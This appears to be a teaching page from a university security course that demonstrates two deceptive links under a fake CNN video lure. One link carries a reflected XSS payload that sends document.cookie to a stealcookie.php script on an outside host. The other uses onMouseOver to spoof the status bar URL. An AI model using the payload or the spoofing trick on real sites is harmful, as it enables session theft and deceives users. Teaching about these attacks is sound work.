<html>
 <head>
  <h2>This page has malicious links</h2>
 </head>
 <body>
<ol>
<li>
First look at this one. This link's text and the actual link behind it are different. You can notice that by hovering the mouse on the link and noting the actual referral location on the status bar.
<br />
<a href="http://vulnerablesite/setgetcookie.htm?username=<script>document.location.replace('http://thoth.dsunix.net/~dsuprotanals/teaching/F06/754/test/XSS/stealcookie.php?c='+document.cookie)</script>">Video footage of Steve Irwine's death available on CNN</a>
 </li>

 <li>
 Now look at this one. Hovering and noting status window won't work on this one because form events write fake link to status window as well!! Hackers grow smarter with security education! <br />

 <a href="./redirectpage.htm"onMouseOver="window.status='http://www.cnn.com/2006/breakingnews/06/10/steveirwine.wmv';return true" onMouseOut="window.status='';return true">Video footage of Steve Irwine's death available on CNN</a>

 </li>
</ol>
 </body>
</html>
